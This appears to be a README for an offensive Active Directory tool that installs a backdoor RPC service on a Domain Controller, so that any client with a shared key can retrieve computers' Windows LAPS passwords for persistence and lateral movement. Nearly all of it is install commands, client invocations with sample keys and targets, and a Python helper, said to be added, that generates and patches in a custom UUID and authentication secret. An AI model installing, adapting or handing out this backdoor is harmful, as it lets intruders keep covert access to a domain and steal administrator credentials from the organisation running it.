A way to maintain long-term access to Windows LAPS passwords (for lateral movement in AD) by installing an Offensive LAPS RPC backdoor as a service on a Domain Controller. Any client that knows the shared authentication key can then ask the DC for a computer's LAPS password over RPC.
Compile the project, optionally replacing:

- The UUID of the RPC interface in Server.idl (default is `12345678-1234-1234-1234-1234567890ab`). A custom one can be generated with Python as `python -c 'import uuid; print(uuid.uuid4())'`.
- The shared secret `SHARED_SECRET` in Server.cpp (default is `0x78ec3379`, which corresponds to the `0123456789abcdef` authentication key). The server stores only this 32-bit hash of the key; the client sends the key itself. A custom one can be calculated with Python as:
```python
def djb2(s):
    # djb2 variant used by the project: seed 1337 (standard djb2 uses 5381),
    # truncated to 32 bits so it fits the SHARED_SECRET constant
    h = 1337
    for x in s:
        h = ((h << 5) + h) + x
    return h & 0xFFFFFFFF

# hash the raw bytes of the authentication key, not its hex string
print(hex(djb2(bytes.fromhex('0123456789abcdef'))))
# '0x78ec3379'
```

Install the Offensive LAPS RPC backdoor as a service on a DC (requires administrative privileges on the DC):
lapsutil.dll must be placed in the same directory as the Server binary!

```
Cmd > Server.exe -install
Cmd > sc start MicrosoftLaps_LRPC_0fb2f016-fe45-4a08-a7f9-a467f5e5fa0b
```

Request a Windows LAPS password providing the authentication key, the target computer's DN and the DC IP or hostname (with an optional port):
```
~$ python client.py -key <AUTH_KEY> <COMPUTER_DN> <DC_IP[:PORT]>
~$ python client.py -key 0123456789abcdef 'CN=PC01,OU=Computers,DC=contoso,DC=local' 127.0.0.1:31337
```

Alternatively, run the Server binary in console mode (instead of as a service) and use the Windows client:

```
Cmd > Server.exe -console
Cmd > Client.exe <DC_IP[:PORT]> <AUTH_KEY> <COMPUTER_DN>
Cmd > Client.exe 127.0.0.1:31337 0123456789abcdef "CN=PC01,OU=Computers,DC=contoso,DC=local"
```
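The compile step above leaves the defaults in place unless you edit two files by hand, and a server built with one `SHARED_SECRET` silently rejects a client that was given a different key. The following helper is an added example, not code from the Offensive LAPS project: it generates a fresh RPC UUID and a random 8-byte authentication key, derives the matching `SHARED_SECRET` with the project's djb2 variant (seed 1337), and swaps the documented defaults out of the Server.idl and Server.cpp text. It relies only on what the README states (the default UUID, the default secret `0x78ec3379`, the default key `0123456789abcdef`); how those defaults are spelled inside the source files is an assumption, so the patcher replaces them as plain substrings and fails loudly if a default is not found.

```python
"""Added example (not part of the Offensive LAPS project): derive a custom
build configuration and patch the defaults out of Server.idl / Server.cpp.

Assumptions (labelled): the defaults appear verbatim in the source files;
the exact line layout of Server.idl and Server.cpp is not known here.
"""
import os
import re
import uuid
from typing import Optional, Tuple

# Defaults as documented in the README
DEFAULT_UUID = "12345678-1234-1234-1234-1234567890ab"
DEFAULT_SECRET = "0x78ec3379"
DEFAULT_KEY = "0123456789abcdef"


def djb2_1337(data: bytes) -> int:
    """The project's djb2 variant: seed 1337 (standard djb2 uses 5381), 32-bit result."""
    h = 1337
    for x in data:
        h = ((h << 5) + h) + x
    return h & 0xFFFFFFFF


def shared_secret(auth_key_hex: str) -> str:
    """SHARED_SECRET literal (as written into Server.cpp) for a hex authentication key."""
    try:
        key = bytes.fromhex(auth_key_hex)
    except ValueError as exc:
        raise ValueError(f"authentication key must be hex: {auth_key_hex!r}") from exc
    if not key:
        raise ValueError("authentication key must not be empty")
    return f"0x{djb2_1337(key):08x}"


def new_build_config(auth_key_hex: Optional[str] = None,
                     rpc_uuid: Optional[str] = None) -> dict:
    """Fresh UUID, random 8-byte key (same length as the default) and the matching secret."""
    if auth_key_hex is None:
        auth_key_hex = os.urandom(8).hex()
    if rpc_uuid is None:
        rpc_uuid = str(uuid.uuid4())
    return {
        "uuid": rpc_uuid,
        "auth_key": auth_key_hex,          # pass this to client.py / Client.exe
        "shared_secret": shared_secret(auth_key_hex),  # put this in Server.cpp
    }


def patch_sources(idl_text: str, cpp_text: str, cfg: dict) -> Tuple[str, str]:
    """Replace every (case-insensitive) occurrence of the documented defaults.

    Raises ValueError if a default is absent, so a mismatched client/server
    build is caught before compiling rather than at the first failed RPC call.
    """
    uuid_re = re.compile(re.escape(DEFAULT_UUID), re.IGNORECASE)
    secret_re = re.compile(re.escape(DEFAULT_SECRET), re.IGNORECASE)
    idl_out, n_uuid = uuid_re.subn(cfg["uuid"], idl_text)
    cpp_out, n_secret = secret_re.subn(cfg["shared_secret"], cpp_text)
    if n_uuid == 0:
        raise ValueError("default UUID not found in Server.idl text")
    if n_secret == 0:
        raise ValueError("default SHARED_SECRET not found in Server.cpp text")
    return idl_out, cpp_out


if __name__ == "__main__":
    cfg = new_build_config()
    print(f"UUID          : {cfg['uuid']}          (Server.idl)")
    print(f"AUTH_KEY      : {cfg['auth_key']}   (client.py -key / Client.exe)")
    print(f"SHARED_SECRET : {cfg['shared_secret']}   (Server.cpp)")
```

Run it once per deployment, apply the printed values to the two source files (or feed the file contents through `patch_sources`), and keep the printed `AUTH_KEY` with the client side only; the DC ends up holding just the 32-bit hash.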